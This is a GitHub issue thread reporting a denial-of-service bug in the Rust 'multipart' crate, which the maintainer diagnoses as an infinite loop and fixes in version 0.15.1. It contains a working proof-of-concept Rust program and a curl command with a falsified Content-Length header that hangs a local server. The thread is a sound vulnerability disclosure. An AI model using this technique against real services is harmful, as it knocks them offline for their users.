### ISSUE TITLE
Improperly-formed multipart/form-data requests can cause indefinite blocking

### ISSUE THREAD

**Issue by sector-f** [abonander/multipart#104]
I've been working on a program that accepts data upload via a multipart/form-data request, and in the process of testing it for vulnerabilities, a colleague of mine ([Nux](https://twitter.com/ItsNux)) and I have discovered that it is quite easy to perform a DoS attack on code using this crate. Thanks also to @SergioBenitez for helping me figure out where the problem was.

Here's the most-minimal proof of concept that I've come up with, which blocks indefinitely. I could see some sort of read timeout being reasonable here, but that's apparently not the case.

```rust
extern crate multipart;
use multipart::server::Multipart;

use std::io::Cursor;

fn process_multipart(string: &str) {
    let request = Cursor::new(string);

    let mut multipart = Multipart::with_body(request, "boundary");
    let multipart_result = multipart.foreach_entry(|_field| {
        // Do nothing
    });

    println!("{:?}", multipart_result);
}


fn main() {
    let http = "\
POST /test.html HTTP/1.1
Host: example.org
Content-Type: multipart/form-data;boundary=\"boundary\"

Content-Disposition: form-data; name=\"field1\"

value1
Content-Disposition: form-data; name=\"field2\"; filename=\"example.txt\"

value2 ";

    process_multipart(&http);
}
```

Here's an example that matches the real code more closely; I was using this code to handle the creation of comments on a forum.

```rust
#![feature(plugin)]
#![plugin(rocket_codegen)]

extern crate rocket;
use rocket::Data;
use rocket::http::{ContentType, Status};
use rocket::response::status::Custom;

extern crate multipart;
use multipart::server::Multipart;
use multipart::server::save::Entries;
use multipart::server::save::SaveResult::*;

use std::io::Read;

#[post("/", format="multipart/form-data", data="<data>")]
fn post_index(data: Data, cont_type: &ContentType) -> Result<(), Custom<&'static str>> {
    let (_, boundary) = cont_type.params().find(|&(k, _)| k == "boundary").ok_or_else(
        || Custom(
            Status::BadRequest,
            "`Content-Type: multipart/form-data` boundary param not provided".into()
        )
    )?;

    let mut comment_text = String::new();

    let mut multipart = Multipart::with_body(data.open(), boundary);
    let multipart_result = multipart.foreach_entry(|field| {
        let is_text = &field.is_text();
        let headers = field.headers;

        match &**headers.name {
            "comment" => {
                if ! is_text {
                    return;
                }

                let mut data = field.data;
                let _ = data.read_to_string(&mut comment_text);
            },
            _ => {
                return;
            },
        }

    });

    if let Err(_) = multipart_result {
        return Err(Custom(
            Status::BadRequest,
            "Could not parse multipart data",
        ));
    }

    if comment_text.is_empty() {
        return Err(Custom(Status::BadRequest, "Comment must be non-empty UTF8"));
    }

    Ok(())
}

#[get("/")]
fn get_index() -> &'static str {
    "Hello, World!"
}

fn main() {
    rocket::ignite().mount("/", routes![get_index, post_index]).launch();
}
```

We discovered that this code was vulnerable to a trivial DoS attack by setting the `Content-Length` header to a value that's less than the actual body. Specifically, running `curl -H "Content-Length: 2" -F "comment=assre45435555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555554" http://localhost:8000` and keeping that connection open for a while (half a minute or so) was enough to cause the code to block permanently, i.e. no new connections receive a reply.

**Comment by abonander** [comment]
This isn't `multipart`'s fault. If Rocket doesn't set a default read timeout, that's Rocket's DoS vulnerability. Any other use case that tries to read the request stream to the end will block indefinitely as well.

**Comment by sector-f** [comment]
The first example I provided does not use Rocket at all yet it still blocks indefinitely due to `Multipart::foreach_entry()` blocking indefinitely upon trying to parse a malformed HTTP request.

**Comment by abonander** [comment]
Sorry, you mentioned read timeouts and Rocket and confused me. Multipart shouldn't be repeatedly attempting to read past the end of the request body, malformed request or not. It has nothing to do with timeouts, just a simple infinite loop bug.

**Comment by abonander** [comment]
Published a fix in `0.15.1`, reopen if it's still an issue.

**Comment by abonander** [comment]
The reduced repro within `server/boundary.rs` wasn't enough so I've added the test verbatim.
